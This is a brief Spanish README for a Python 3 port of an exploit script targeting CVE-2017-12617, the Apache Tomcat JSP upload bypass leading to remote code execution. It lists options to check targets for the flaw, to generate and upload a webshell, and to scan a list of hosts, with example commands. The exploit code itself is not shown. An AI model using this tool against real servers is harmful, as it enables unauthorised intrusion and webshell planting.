
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Omisión de carga JSP / Ejecución remota de código para Python3
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Bypass de Subida JSP / Ejecución Remota de Código para Python3
Solo hice algunos ajustes al script original para que sea compatible con Python 3!
Si hay algún problema o inconveniente, no dudes en enviarme un correo a [email protected] o también puedes contactarme si quieres.
No juzgues mi correo, es usado como una cuenta desechable
./cve-2017-12617.py [options]
opciones:
-u ,--url [::] verifica si la URL objetivo es vulnerable
-p,--pwn [::] genera un webshell y súbelo
-l,--list [::] lista de hosts
[+]uso:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt